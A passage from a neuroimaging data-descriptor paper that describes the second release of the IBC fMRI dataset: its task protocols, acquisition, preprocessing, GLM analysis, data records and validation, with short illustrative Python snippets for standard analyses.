All tasks were organized as a block-design experiment with one condition per trial. Every trial started with a fixation cross, whose duration was jittered between 0.5 seconds and 4.5 seconds, after which a picture of an item was displayed on the screen together with a rating scale and a cursor. Participants were to indicate how pleasant the presented stimulus was, by sliding the cursor along the scale. Such scale ranged between 1 and 100. The value 1 corresponded to the choices “unpleasant” or “indifferent”; the middle of the scale corresponded to the choice “pleasant”; and the value 100 corresponded to the choice “very pleasant”. Therefore, the ratings related only to the estimation of the positive-incentive value of the items displayed.
One full session was dedicated to the data collection of all tasks. It comprised eight runs with sixty trials each. Although each trial had a variable duration, according to the time spent by the participant in the assessment, no run lasted longer than eight minutes and sixteen seconds. Every task was presented twice in two fully dedicated runs. The stimuli were always different between runs of the same task. As a consequence, no stimulus was ever repeated in any trial and, thus, no item was ever assessed more than once by the participants. To avoid any selection bias in the sequence of stimuli, the order of their presentation was shuffled across trials and between runs of the same type. This shuffle is embedded in the code of the protocol and, thus, the sequence was determined upon launching it. Consequently, the sequence of stimuli was also random across subjects. For each run (of each session), this sequence was properly registered in the logfile generated by the protocol.
### Theory-of-mind and pain matrices task battery
This battery of tasks was adapted from the original task-fMRI localizers of Saxe Lab, intended to identify functional regions-of-interest in the Theory-of-Mind network and Pain Matrix regions. These localizers rely on a set of protocols along with verbal and non-verbal stimuli, whose material was obtained from https://saxelab.mit.edu/localizers.
Minor changes were employed in the present versions of the tasks herein described. Because the cohort of this dataset is composed solely of native French speakers, the verbal stimuli were translated into French; the durations of the reading period and the response period within conditions were accordingly slightly increased.
#### Theory-of-mind localizer (TOM localizer)
The Theory-of-Mind Localizer (TOM localizer) was intended to identify brain regions involved in theory-of-mind and social cognition, by contrasting activation during two distinct story conditions: (1) belief judgments, reading a false-belief story that portrayed characters with false beliefs about their own reality; and (2) fact judgments, reading a story about a false photograph, map or sign [28].
The task was organized as a block-design experiment with one condition per trial. Every trial started with a fixation cross of twelve seconds, followed by the main condition that comprised a reading period of eighteen seconds and a response period of six seconds. Its total duration amounted to thirty six seconds. There were ten trials in a run, followed by an extra-period of fixation cross for twelve seconds at the end of the run. Two runs were dedicated to this task in one single session.
The designs, i.e. the sequences of conditions across trials, for two possible runs were pre-determined by the authors of the original study and hard-coded in the original protocol (see Section “Theory-of-Mind and Pain Matrices task battery”). The IBC-adapted protocols contain exactly the same designs. For all subjects, design #1 was employed for the PA-run and design #2 for the AP-run.
#### Theory-of-mind and pain-matrix narrative localizer (Emotional Pain localizer)
The Theory-of-Mind and Pain-Matrix Narrative Localizer (Emotional Pain localizer) was intended to identify brain regions involved in theory-of-mind and Pain Matrix areas, by contrasting activation during two distinct story conditions: reading a story that portrayed characters suffering from (1) emotional pain and (2) physical pain [29].
The experimental design of this task is identical to the one employed for the TOM localizer, except that the reading period lasted twelve seconds instead of eighteen seconds. Two different designs were pre-determined by the authors of the original study and they were employed across runs and participants, also in the same way as described for the TOM localizer (see Section “Theory-of-Mind Localizer (TOM localizer)”).
#### Theory-of-mind and pain matrix movie localizer (Pain Movie localizer)
The Theory-of-Mind and Pain Matrix Movie Localizer (Pain Movie localizer) consisted in the display of “Partly Cloudy”, a 6-minute movie from Disney Pixar, in order to study the responses implicated in theory-of-mind and pain-matrix brain regions [29,30].
Two main conditions were thus hand-coded in the movie, according to [30], as follows: (1) mental movie, in which characters were experiencing changes in beliefs, desires, and/or emotions; and (2) physical pain movie, in which characters were experiencing physical pain. Such conditions were intended to evoke brain responses from the theory-of-mind and pain-matrix networks, respectively. All moments in the movie not focused on the direct interaction of the main characters were considered as a baseline period.
### Visual short-term memory (VSTM) and enumeration task battery
This battery of tasks was adapted from the control experiment described in [31]. They were intended to investigate the role of the Posterior Parietal Cortex (PPC) involved in the concurrent processing of a variable number of items. Because subjects can only process three or four items at a time, this phenomenon may reflect a general mechanism of object individuation [34,35]. On the other hand, PPC has been implicated in studies of capacity limits, during Visual Short-Term Memory (VSTM) [36] and Enumeration [35]. While the former requires high encoding precision of items due to their multiple features, like location and orientation, the latter requires no encoding of object features. By comparing the neural response of the PPC with respect to the two tasks, the original study demonstrated a non-linear increase of activation, in this region, along with the increasing number of items. Besides, this relationship was different in the two tasks. Concretely, PPC activation started to increase from two items onward in the VSTM task, whereas such increase only happened from three items onward in the Enumeration task.
For both tasks, the stimuli consisted of sets of tilted dark-gray bars displayed on a light-gray background. Minor changes were made in the versions described here: (1) both the response period and the fixation-dot period at the end of each trial were made constant in both tasks; and (2) for the Enumeration task, answers were registered via a button-press response box instead of the audio recording of oral responses used in the original study.
### Visual short-term memory task (VSTM)
In the VSTM task, participants were presented with a certain number of bars, varying from one to six.
Every trial started with the presentation of a black fixation dot in the center of the screen for 0.5 seconds. While still on the screen, the black fixation dot was then displayed together with a certain number of tilted bars –variable between trials from one to six– for 0.15 seconds. Afterwards, a white fixation dot was shown for 1 second. It was then replaced by the test stimulus for 1.7 seconds, displaying the same number of tilted bars in the same positions together with a green fixation dot. The participants were to remember the orientation of the bars from the previous sample and answer with one of two possible button presses, depending on whether one of the bars in the current display had changed orientation by 90°, which was the case in half of the trials. The test display was replaced by another black fixation dot for a fixed duration of 3.8 seconds. The trial was thus 7.15 seconds long. There were 72 trials in a run and four runs in a single session. Pairs of runs were launched consecutively. To avoid selection bias in the sequence of stimuli, the order of the trials was shuffled with respect to numerosity and change of orientation, within runs and across participants.
### Enumeration task

In the Enumeration task, participants were presented with a certain number of bars, varying from one to eight.
Every trial started with the presentation of a black fixation dot in the center of the screen for 0.5 seconds. While still on the screen, the black fixation dot was then displayed together with a certain number of tilted bars –variable between trials from one to eight– for 0.15 seconds. It was followed by a response period of 1.7 seconds, in which only a green fixation dot was displayed on the screen. The participants were to remember the number of bars shown right before and answer accordingly, by pressing the corresponding button. Afterwards, another black fixation dot was displayed for a fixed duration of 7.8 seconds. The trial length was thus 9.95 seconds. There were ninety-six trials in a run and two (consecutive) runs in a single session. To avoid selection bias in the sequence of stimuli, the order of the trials was shuffled with respect to numerosity, within runs and across participants.
### Self task

The Self task was adapted from the study described in32, originally developed to investigate the Self-Reference Effect in older adults. This effect pertains to the encoding of information in reference to the self, a memory-advantaged process. Consequently, memory-retrieval performance is also better for information encoded in reference to the self than to other people, objects or concepts.
The present task was thus composed of two types of phases, relying on encoding and recognition procedures, respectively. The encoding phase was intended to map brain regions related to the encoding of items in reference to the self, whereas the recognition phase was conceived to isolate the memory network specifically involved in the retrieval of those items. The phases were interleaved, so that each recognition phase always related to the encoding phase presented immediately before.
The encoding phase had two blocks. Each block was composed of a set of trials pertaining to the same condition. For both conditions, a different adjective was presented at every trial on the screen. The participants were to judge whether or not the adjective described themselves –self-reference encoding condition– or another person –other-reference encoding condition. The other person was a public figure in France in the same age range as the cohort, whose gender matched the gender of the participant. Two public figures were mentioned, one at a time, across all runs; four public figures –two of each gender– were selected beforehand. In this way, we ensured that all participants were able to successfully characterize the same individuals, holding familiarity and affective attributes constant with respect to these individuals.
In the recognition phase, participants were to remember whether or not the adjectives had been displayed during the previous encoding phase. This phase was composed of a single block of trials, pertaining to three categories of conditions. New adjectives were presented during one half of the trials, whereas the other half referred to the adjectives displayed in the previous phase. Thus, trials referring to the adjectives from “self-reference encoding” were part of the self-reference recognition category, and trials referring to the “other-reference encoding” were part of the other-reference recognition category. Conditions were then defined according to the type of answer provided by the participant for each of these categories (see Online-only Table 1 for details).
There were four runs in one session. The first three had three phases; the fourth and last run had four phases (see Table 2). Their total durations were twelve and 15.97 minutes, respectively. Blocks of both phases started with an instruction condition of five seconds, containing a visual cue. The cue was related to the judgment to be performed next, according to the type of condition featured in that block. A set of trials, showing different adjectives, was presented afterwards. Each trial had a duration of five seconds, during which a response was to be provided by the participant. During the trials of the encoding blocks, participants had to press the button with their left or right hand, depending on whether or not they believed the adjective on display described someone (i.e. self or other, respectively for the “self-reference encoding” or “other-reference encoding” conditions). During the trials of the recognition block, participants had to answer in the same way, depending on whether or not they believed the adjective had been presented before. A fixation cross, whose duration was jittered between 0.3 and 0.5 seconds, was always presented between trials. A rest period, whose duration was jittered between ten and fourteen seconds, was introduced between the encoding and recognition phases. Long intervals between these two phases, i.e. longer than ten seconds, ensured the measurement of long-term memory processes during the recognition phase, at the age range of the cohort37,38. Fixation-cross periods of three and fifteen seconds were also introduced at the beginning and end of each run, respectively.
All adjectives were presented in the lexical form matching the gender of the participant. There were two sets of adjectives: one set was presented as new adjectives during the recognition phase, and the other set was used for all remaining conditions of both phases. To avoid cognitive bias across the cohort, the sets were switched for half of the participants. Adjectives were never repeated across runs, but their sequence was fixed for the same runs and across participants using the same set. The pseudo-randomization of the trials of the recognition phase was pre-determined by the authors of the original study according to their category (i.e. “self-reference recognition”, “other-reference recognition” or “new”), such that no more than three consecutive trials of the same category were presented within a block.
For the sake of clarity, Online-only Table 1 contains a full description of all main conditions employed in the experimental design of this task.
### Bang task

The Bang task was adapted from the study described in33, dedicated to investigating aging effects on neural responsiveness during naturalistic viewing.
The task consists in watching –viewing and listening to– an edited version of the episode “Bang! You’re Dead” from the TV series “Alfred Hitchcock Presents”. The original black-and-white, 25-minute episode was condensed to seven minutes and fifty-five seconds while preserving its narrative. The plot of the final movie includes scenes with characters talking to each other as well as scenes with no verbal communication. The conditions of this task were thus set by contiguous scenes of speech and no speech.
This task was performed during a single run in a single session. Participants were never informed of the title of the movie before the end of the session. Ten seconds of acquisition were added at the end of the run. The total duration of the run was thus eight minutes and five seconds.
## Data Acquisition
Data across participants were acquired throughout six MRI sessions, whose structure is described in Table 2. Deviations from this structure were registered for two MRI sessions. In addition, as noted in Section “Data quality” and in Fig. 1, a drop in tSNR was identified for some MRI sessions. Moreover, data for the tasks featured in this release had not yet been collected for subject 8 (consult Section “Participants” for further details). These anomalies in the data are summarized in Online-only Table 2.
### Behavioral Data
Active responses were required from the participants in all tasks. All behavioral data, such as the qualitative responses to the different conditions and the corresponding response times, were recorded in log files generated by the stimulus-delivery software.
### Imaging Data
FMRI data were collected using a Gradient-Echo (GE), whole-brain, Multi-Band (MB)-accelerated39,40, T2*-weighted Echo-Planar Imaging (EPI) sequence with Blood-Oxygenation-Level-Dependent (BOLD) contrast. Each run was always acquired twice, using two opposite phase-encoding directions: one from Posterior to Anterior (PA) and the other from Anterior to Posterior (AP). The main purpose was to ensure within-subject replication of the same tasks, while mitigating potential limitations of the distortion-correction procedure.
Spin-Echo (SE) EPI-2D image volumes were acquired in order to compensate for spatial distortions. Similarly to the GE-EPI sequences, two different phase-encoding directions, i.e. PA and AP, were employed in different runs pertaining to this sequence. There were four runs per session: one pair of PA and AP SE EPI-2D before the start of the GE-EPI sequences and another pair at the end.
The parameters for all types of sequences employed are provided in19 as well as in the documentation available on the IBC website: https://project.inria.fr/IBC/data/
## Data Analysis
### Image conversion
The acquired DICOM images were converted to NIfTI format using the dcm2nii tool, which can be found at https://www.nitrc.org/projects/dcm2nii. During conversion to NIfTI, all images were fully anonymized, i.e. pseudonyms were removed and images were defaced using the mri_deface command-line tool from the FreeSurfer 6.0.0 library.
### Preprocessing
Source data were preprocessed using the same pipeline employed for the first release of the IBC dataset; refer to19 for complete information about the procedures undertaken during this stage.
In summary, raw data were preprocessed using PyPreprocess (https://github.com/neurospin/pypreprocess), a module dedicated to launching, within the Python ecosystem, pre-compiled functions of the SPM12 software package (v6685) and of the FSL library (v5.0).
First, the susceptibility-induced off-resonance field was estimated from four SE EPI-2D volumes, half of them acquired in each of two opposite phase-encoding directions (see Section “Imaging Data” for details). The images were corrected based on the estimated deformation model, using the topup tool41 implemented in FSL42.
GE-EPI volumes of each participant were then aligned to each other, using a rigid body transformation, in which the average volume of all images across runs (per session) was used as reference43.
The mean EPI volume was also co-registered onto the T1-weighted MPRAGE (anatomical) volume of the corresponding participant44, acquired during the Screening session (consult19 for details).
The individual anatomical volumes were then segmented into tissue types in order to allow for the normalization of both anatomical and functional data into the standard MNI152 space, which was performed using the Unified Segmentation probabilistic framework45. Concretely, the segmented volumes were used to compute the deformation field for normalization to the standard MNI152 space.
### FMRI model specification
FMRI data were analyzed using the General Linear Model (GLM). Regressors-of-interest in the model were designed to capture variations in the BOLD signal, which are in turn coupled to the neuronal activity pertaining to task performance. To this end, the temporal profile of the task stimuli is convolved with the Hemodynamic Response Function (HRF) –defined according to46,47– in order to obtain the theoretical neurophysiological profile of brain activity in response to behavior. For block-design experiments, the temporal profiles of stimuli are typically characterized by boxcar functions defined by triplets –onset time, duration and trial type– that can be extracted from the log files generated by the stimulus-delivery software.
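To make this construction concrete, the following minimal sketch builds such a regressor from onset and duration triplets and a double-gamma HRF. It is an illustration only: the HRF parameters and block onsets are hypothetical, and the actual implementation lives in the SPM/Nistats code used for the analysis.

```python
import numpy as np
from scipy.stats import gamma

def double_gamma_hrf(t):
    # canonical double-gamma shape (peak near 5 s, undershoot near 15 s);
    # an approximation of the SPM-style HRF, not a verbatim copy of it
    return gamma.pdf(t, 6) - gamma.pdf(t, 16) / 6.0

def boxcar_regressor(onsets, durations, n_scans, tr, dt=0.1):
    # boxcar on a fine time grid, convolved with the HRF, sampled at the TR
    t = np.arange(0, n_scans * tr, dt)
    boxcar = np.zeros_like(t)
    for onset, duration in zip(onsets, durations):
        boxcar[(t >= onset) & (t < onset + duration)] = 1.0
    conv = np.convolve(boxcar, double_gamma_hrf(np.arange(0, 32, dt)))[:t.size]
    return conv[::int(round(tr / dt))]  # one value per scan

# hypothetical block design: 18 s reading blocks starting at 12 s, 48 s, 84 s
reg = boxcar_regressor([12, 48, 84], [18, 18, 18], n_scans=60, tr=2.0)
```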
Because the present release encompasses tasks with different types of experimental designs, regressors-of-interest can refer to either conditions, wherein main effects of stimuli span a relatively long period, or parametric effects of those stimuli. Online-only Table 1 contains a complete description of all regressors-of-interest implemented in the models of every task.
Nuisance regressors were also modeled in order to account for different types of spurious effects arising at acquisition time, such as fluctuations due to latency in the HRF peak response, movements, physiological noise and slow drifts within a run. Another set of regressors-of-no-interest, referring to either absent or incorrect behavioral responses, was implemented in the model of the Self task. Concretely, the regressors “encode_self_no_response”, “encode_other_no_response”, “recognition_self_no_response” and “recognition_other_no_response” –related to the absence of responses in each condition– plus “recognition_self_miss” and “recognition_other_miss” –related to the unsuccessful recognition of an adjective previously presented– as well as “false_alarm” –related to the misrecognition of a new adjective as one already presented– were modeled separately, so as to grant an accurate isolation of the effects pertaining to “recognition” and “self-reference” in the regressors-of-interest (see Section “Self task” for further details about the design of this task).
A complete description of the general procedures concerned with the GLM implementation of the IBC data can be found in the first data-descriptor article19. Such implementation was performed using Nistats python module v0.0.1b (https://nistats.github.io), leveraging Nilearn python module v0.6.048 (https://nilearn.github.io/).
### Model estimation
In order to restrict GLM parameter estimation to voxels inside functional brain regions, a brain mask was extracted from the normalized mean GE-EPI volume thresholded at a liberal level of 0.25, using Nilearn. This corresponds to a 25% average probability of finding gray matter in a particular voxel across subjects. A mass-univariate GLM fit was then applied to the preprocessed EPI data, for every run in every task, using Nistats. For this fit, we set a spatial smoothing of 5 mm full-width-at-half-maximum as a regularization term of the model; spatial smoothing is a standard procedure that increases the Signal-to-Noise Ratio (SNR) while facilitating between-subject comparison. Parameter estimates for all regressors implemented in the model were computed, along with the respective covariance, at every voxel. Linear combinations of the parameter estimates computed for the regressors-of-interest (listed in Online-only Table 1) as well as for the baseline were performed in order to obtain contrast maps with the relevant evoked responses.
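As a pointer for readers who wish to reproduce this kind of fit, the sketch below uses the FirstLevelModel interface of Nistats (since merged into Nilearn as nilearn.glm). The file name, event table and TR are hypothetical; the released analysis code (see Section “Code availability”) remains the authoritative implementation.

```python
import pandas as pd
from nilearn.glm.first_level import FirstLevelModel

# hypothetical paradigm descriptors: onset, duration and trial-type triplets
events = pd.DataFrame({"onset": [12.0, 48.0],
                       "duration": [18.0, 18.0],
                       "trial_type": ["belief", "photo"]})

model = FirstLevelModel(t_r=2.0, hrf_model="spm",
                        smoothing_fwhm=5.0)  # 5 mm FWHM, as described above
model = model.fit("sub-01_task-tom_bold.nii.gz", events=events)
z_map = model.compute_contrast("belief - photo", output_type="z_score")
```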
More details about model estimation can be found in the first data-descriptor article19. Its implementation and the ensuing statistical analyses were performed using Nistats (about Nistats, see Section “FMRI Model Specification”).
### Summary statistics
Because data were collected per task and subject in –at least– two acquisitions with opposite phase-encoding directions (see Section “Imaging Data” for details), statistics of their joint effects were calculated under a Fixed-Effects (FFX) model.
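One standard formulation of such a fixed-effects combination is precision weighting of the per-acquisition effect and variance maps. The sketch below states that formula; it is our assumption about the computation, not a transcript of the released code.

```python
import numpy as np

def fixed_effects(effects, variances):
    # effects, variances: arrays of shape (n_acquisitions, n_voxels)
    w = 1.0 / np.asarray(variances)            # precision of each acquisition
    ffx_effect = (np.asarray(effects) * w).sum(axis=0) / w.sum(axis=0)
    ffx_variance = 1.0 / w.sum(axis=0)
    return ffx_effect, ffx_variance, ffx_effect / np.sqrt(ffx_variance)
```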
t-tests were then computed at every voxel for each individual contrast, in order to assess the statistical significance of differences among evoked responses. To ensure standardized results independent of the number of observations, t-values were directly converted into z-values.
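A common recipe for this conversion matches tail probabilities between the t and normal distributions; a minimal sketch follows (we do not claim this is bit-for-bit what Nistats does).

```python
import numpy as np
from scipy import stats

def t_to_z(t_values, dof):
    # go through the survival function to keep precision in the far tails
    p = stats.t.sf(np.abs(t_values), dof)  # one-sided tail probability
    z = stats.norm.isf(p)                  # z-value with the same tail mass
    return np.sign(t_values) * z
```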
Data derivatives are thus delivered as individual contrast maps containing standard scores at all voxels within a gray-matter mask thresholded at an average probability >25% across subjects. We note that these postprocessed individual maps were obtained from the GLM fit of the preprocessed EPI maps and, thus, are represented in the standard MNI152 space. For more information about access to the data derivatives, refer to Section “Derived statistical maps”.
## Data Records
Both the raw fMRI data (aka “source data”) and the derived statistical maps of the IBC dataset are publicly available.
### Source data
Source data of the present release (plus first and third releases) can be accessed via the public repository OpenNeuro49 under the data accession number ds00268550. This collection comprises 1.1 TB of MRI data. A former collection only referring to source data from the first release is still available in the same repository51.
The NIfTI files as well as paradigm descriptors and imaging parameters are organized per run for each session according to BIDS Specification:
• the data repository is organized in twelve main directories, sub-01 to sub-15; we underline that sub-02, sub-03 and sub-10 are not part of the dataset and that the corresponding data from sub-08 will be made available in future releases (see Table 1);
• data from each subject are numbered on a per-session basis, following the chronological order of the acquisitions; note that this order is not the same for all subjects; the IBC documentation at https://project.inria.fr/IBC/data/ can be consulted for the exact correspondence between session number and session id for every subject (session ids of the first and second releases are provided in Table 2 of19 and Table 2 of the present article, respectively);
• acquisitions are organized within session by modality;
• different identifiers are assigned to different types of data as follows:
• gzipped NIfTI 4D image volumes of BOLD fMRI data are named as sub-XX_ses-YY_task-ZZZ_dir-AA_bold.nii.gz, in which XX and YY refer respectively to the subject and session id, ZZZ refers to the name of the task, and AA can be either ‘PA’ or ‘AP’ depending on the phase-encoding direction (a small helper illustrating this naming scheme is sketched after this list);
• event files are named as sub-XX_ses-YY_task-ZZZ_dir-AA_event.tsv;
• single-band, reference images are named as sub-XX_ses-YY_task-ZZZ_dir-AA_sbref.nii.gz.
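As a small illustration of the naming scheme above, a hypothetical helper (ours, not part of the IBC code base) that assembles such basenames could read:

```python
def ibc_bold_name(subject, session, task, direction):
    # e.g. ibc_bold_name(1, 4, "Self", "ap")
    #      -> "sub-01_ses-04_task-Self_dir-AP_bold.nii.gz"
    return (f"sub-{subject:02d}_ses-{session:02d}"
            f"_task-{task}_dir-{direction.upper()}_bold.nii.gz")
```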
Although BIDS v1.2.1 does not provide support for data derivatives, a similar directory tree structure was still preserved for this content.
### Derived statistical maps
The unthresholded statistical contrast maps have been released in the public repository NeuroVault52 with the id = 661853. This collection comprises data from both releases. A former collection, referring only to data derivatives from the first release, is still available in the same repository (id = 443854).
## Technical Validation
### Behavioral data
Response accuracy was calculated for those tasks requiring overt responses. It provides a quantitative assessment of the quality of the imaging data in terms of the subjects’ compliance. Because the imaging data reflect brain activity related to behavior, scores of response accuracy across trials are good indicators of faithful functional representations of the cognitive mechanisms involved in the correct performance of the task. Individual scores are provided as percentages of correct responses with respect to the total number of responses in every run of a given task. The average of these scores is also provided as an indicator of the overall performance of the participant in that specific task.
### Mental time travel task battery
#### Theory-of-mind
In the Theory-of-Mind task, participants were to read stories involving either false beliefs about the state of the world or scenery representations that were misleading or outdated. Afterwards, they were to answer a question pertaining to the plot, for which one out of two possible answers was correct (see Section “Theory-of-Mind Localizer (TOM localizer)” for details). Online-only Table 4 provides the individual scores achieved for this task. The average ± SD across participants is 74 ± 16%, i.e. higher than chance level (50%). These results show that the participants overall understood the storylines and were thus able to successfully judge the facts pointed out in the questions.
#### Visual short-term memory

In the VSTM task, participants were asked to identify, for every trial, whether there had been a change in the orientation of one of the bars between two consecutive displays of the same number of bars (see Section “Visual Short-Term Memory task (VSTM)” for details). There were thus two possible answers. Online-only Table 5 provides the individual scores for every run and the average across runs, grouped by the numerosity of the visual stimuli (measured by the number of bars); numerosity ranged from one to six. In line with the behavioral results reported in the original study (Fig. 2, plot E of31), the scores start decreasing more prominently for numerosity >3 (see Online-only Table 6).
#### Enumeration

In the Enumeration task, participants were asked to identify, for every trial, the exact number of bars displayed on the screen (see Section “Enumeration task” for details). The number of bars ranged from one to eight; there were thus eight possible answers. Online-only Table 7 provides the individual scores for every run and the average across runs, grouped by the numerosity of the visual stimuli (measured by the number of bars). Following the overall trend of the behavioral results reported in the original study (Fig. 2, plot D of31), the scores decrease substantially for numerosity >4 (see Online-only Table 8).
### Self task – recognition phase
The Self-task paradigm comprised two different phases: the encoding and recognition phases (see Section “Self task” for details). Both of them involved overt responses, although only the recognition phase had objectively correct answers. In this phase, participants were to judge whether the adjective on display had already been presented in the previous encoding phase. Online-only Table 9 provides the individual scores for every run and the average across runs. The average ± SD across participants is 83 ± 8%, i.e. higher than chance level (50%), showing that participants successfully recognized both familiar and new adjectives in the majority of the “recognition” trials. Despite some low behavioral scores (particularly in run 3 for participant 1 and runs 0 and 1 for participant 5), only trials with active and correct responses were included in the regressors-of-interest; the neuroimaging results are therefore not impacted by spurious effects potentially derived from occasional poor performances.
## Imaging Data
### Data quality
In order to provide an approximate estimate of data quality, measurements of the preprocessed data are presented in Fig. 1 and described as follows:
• The temporal SNR (tSNR), defined as the mean of each voxel’s time course divided by its standard deviation, computed on normalized and unsmoothed data and averaged across all acquisitions (a minimal computation sketch is given after this list). Its values go up to 70 in the cortex. Given the high resolution of the data (1.5 mm isotropic), such values are indicative of a good image quality55;
• The histogram of the six rigid-body motion estimates per scan, in mm and degrees (for translational and rotational motion, respectively), together with their 99% coverage interval. One can notice that this interval spans approximately [−1.1, 1.5] mm (and, likewise, degrees), showing that motion excursions beyond 1.5 mm or 1.5° are rare. No acquisition was discarded due to excessive motion (>2 mm or 2°).
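As referenced in the first bullet, a minimal tSNR computation on a preprocessed 4D volume might look as follows (the file names are hypothetical):

```python
import nibabel as nib
import numpy as np

img = nib.load("preprocessed_bold.nii.gz")              # hypothetical input
data = img.get_fdata()                                  # shape (x, y, z, time)
tsnr = data.mean(axis=-1) / (data.std(axis=-1) + 1e-8)  # guard against zeros
nib.save(nib.Nifti1Image(tsnr.astype(np.float32), img.affine), "tsnr.nii.gz")
```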
We observe an overall improvement of the tSNR with respect to the first release (see Section “Data quality” and Fig. 1 in19) in cortical regions, where functional activity in response to behavior is well covered (see Fig. 3). However, poor coverage was attained at the bottom of the cerebellum (for details about which sessions specifically contributed to this tSNR deviation, consult Online-only Table 2). As shown by Fig. 2, this issue is not driven by subject, condition or phase-encoding-direction effects; it refers instead to a transient irregularity that affected the field-of-view during the acquisition period.
### Relevance of the IBC dataset for brain mapping
#### Effect of subject identity and task stimuli on activation
Taking into account the output of the GLM analysis for each acquisition, an assessment was performed at every voxel of how much variability of the signal could be explained by the effects of: (1) subject identity, (2) condition, and (3) phase-encoding direction. To assess the impact of these three factors, a one-way Analysis-of-Variance (ANOVA) was computed over all contrast maps –1782 maps from the 11 subjects– obtained from the first-level analysis of the data, separately for each of the aforementioned factors. The resulting statistical maps are displayed at the top of Fig. 2. They show that both subject and condition effects are uniformly significant at p < 0.05, corrected for multiple comparisons using the False Discovery Rate (FDR). Condition effects are overall higher than subject effects, particularly in sensory cortices such as visual, auditory and somatosensory regions. Effects pertaining to the phase-encoding direction are only significant in smaller areas comprising superior cortical regions, with special emphasis on the occipital lobe. We hypothesize that such results derive from the fact that PA data account for a larger share of this dataset than AP data (see Table 2).
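To make the procedure concrete, a voxel-wise one-way ANOVA for a single factor, say subject identity, can be sketched as below. The array layout and the use of SciPy's axis argument are our assumptions, not a transcript of the actual analysis script.

```python
import numpy as np
from scipy.stats import f_oneway

def voxelwise_anova(maps, labels):
    # maps: array (n_maps, n_voxels); labels: factor level of each map
    groups = [maps[labels == level] for level in np.unique(labels)]
    # recent SciPy versions accept an axis argument for vectorized tests
    f_vals, p_vals = f_oneway(*groups, axis=0)
    return f_vals, p_vals
```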
#### Similarity of brain activation patterns matches between-task similarity
Within-subject correlation matrices of all FFX contrast maps pertaining to experimental conditions vs. baseline were computed to summarize the similarity between the functional responses to these conditions. The average of the correlation matrices across subjects was then estimated in order to assess the pattern of similarity between tasks. Because this second release accounts for a total of 49 conditions (and, consequently, 49 elementary contrasts) among all tasks, the average of the correlation matrices from all participants is represented as a 49 × 49 correlation matrix (see Fig. 2, bottom-left). Note that this approach is different from performing a second-level analysis across subjects per task and computing the corresponding correlation matrix between tasks. The experimental conditions were also encoded according to the Cognitive Atlas ontology (https://www.cognitiveatlas.org; see also21 for the link between each condition and cognitive labels). This labeling is listed in detail in Online-only Table 10, accounting for a total of 59 different cognitive components shared by the elementary contrasts. (Note that the number of cognitive components for the total set of contrasts is 63 and, thus, slightly higher than the number reported for the elementary contrasts only.) The 49 × 49 correlation matrix of the conditions defined in terms of occurrences of these cognitive descriptions was also computed, since such labeling offers an approximate characterization of the tasks (see Fig. 2, bottom-right). The two matrices show clear similarities, together with discrepancies that are worthy of further investigation.
In order to assess the validity of our cognitive descriptions, we then tested how similar the cross-condition characterizations derived from the cognitive labels and from the activation maps are to each other. A Representational Similarity Analysis56 was performed between the activation-map and cognitive-occurrence correlation matrices by means of the Spearman correlation between their upper-triangular coefficients, which amounted to 0.21 with $p \le 10^{-13}$. We then repeated this analysis for the tasks of the first and second releases taken together, which combine 109 elementary conditions with 106 cognitive components. The Spearman correlation between the two matrices is, in this case, 0.23 with $p \le 10^{-72}$, which is higher not only than the correlation obtained from the tasks of the second release but also than that of the first release (Spearman correlation: 0.21, with $p \le 10^{-17}$)19. We conclude that the similarity tends to increase as more data are included in the dataset, because new cognitive elements are added to the description of all tasks.
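Operationally, this comparison reduces to a Spearman correlation over the matrices' upper triangles; a sketch, assuming both matrices share the same condition ordering:

```python
import numpy as np
from scipy.stats import spearmanr

def rsa_spearman(mat_a, mat_b):
    # compare upper triangles only, excluding the diagonal
    iu = np.triu_indices_from(mat_a, k=1)
    return spearmanr(mat_a[iu], mat_b[iu])  # (rho, p-value)
```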
### Brain coverage
Figure 3 displays all brain areas significantly covered by the tasks of this dataset extension. Most cortical and sub-cortical regions are altogether represented by this group of tasks. By comparison with the first release, the present one shows a prominent improvement of significant coverage in the cingulate cortex, namely its posterior section in the parietal lobe and its anterior section in the prefrontal lobe. Similarly, a better coverage of the right anterior temporal lobe can also be observed in this release.
On the other hand, a prominent deviation of the results at the bottom of the cerebellum in comparison with its neighboring regions is present due to a lesser coverage of this area, as reported in Section “Data quality” and Fig. 1.
As the dataset becomes larger, one may expect a progressive improvement of brain coverage. However, as already noted in19, full coverage may not be attained due to MR-related technical restrictions. Some locations are particularly sensitive to, e.g., coil sensitivity or intra-voxel dephasing, which can result in a reduced tSNR in certain functional brain regions.
## Usage Notes
The IBC project continues to promote open access and to encourage the community to adhere to practices of data sharing and reproducibility in neuroimaging. Free online access to the raw data and derivatives is thus assured by OpenNeuro50 and NeuroVault53, respectively.
This second release, together with the first one, brings together a variety of tasks –featuring in total 221 independent contrasts– while increasing the brain area significantly covered by these tasks (see Section “Brain coverage” for more details).
The collection of new data continues until 2022 and more releases are expected in the coming years. The third release is already planned for the present year and will be fully dedicated to the visual system; it will contain tasks pertaining to retinotopy, movie watching and the viewing of naturalistic scenes. Future releases will also address in greater depth the auditory system, through tonotopy as well as tasks on auditory language comprehension, listening to naturalistic sounds and music perception. Other tasks on biological motion, stimulus salience, working memory, motor inhibition, risk-based decision making and spatial navigation will also be part of these future releases. Finally, although IBC stands foremost as a task-fMRI dataset with a strong emphasis on the task dimension, future releases will also be dedicated to resting-state fMRI data as well as to other MRI modalities, concretely high-resolution T1- and T2-weighted imaging, diffusion-weighted imaging, T1- and T2-relaxometry and myelin water fraction.
The official website of the IBC project (https://project.inria.fr/IBC/) can be consulted anytime for a continuous update about the latest and forthcoming releases.
## Code availability
Metadata concerning the stimuli presented during the BOLD fMRI runs are publicly available at https://github.com/hbp-brain-charting/public_protocols. They include: (1) the task-stimuli protocols; (2) demo presentations of the tasks as video annotations; (3) instructions to the participants; and (4) scripts to extract paradigm descriptors from log files for the GLM estimation.
Task-stimuli protocols from the Preference, TOM and VSTM + Enumeration batteries were adapted from the original studies in order to comply with the IBC experimental settings, without affecting the design of the original paradigms. The MTT battery uses an original protocol developed in Python in the context of the IBC project. The protocols of the Self and Bang tasks were re-written from scratch in Python, with no change to the designs of the original paradigms.
The scripts used for data analysis are available on GitHub under the Simplified BSD license:
https://github.com/hbp-brain-charting/public_analysis_code. Additionally, a full description of all contrasts featured in the data derivatives (see Section “Derived statistical maps” for details), as well as a list of the main contrasts, is provided under the folder hbp-brain-charting/public_analysis_code/ibc_data.
## References
1. Wager, T. D., Lindquist, M. & Kaplan, L. Meta-analysis of functional neuroimaging data: current and future directions. Soc Cogn Affect Neurosci 2, 150–158, https://doi.org/10.1093/scan/nsm015 (2007).
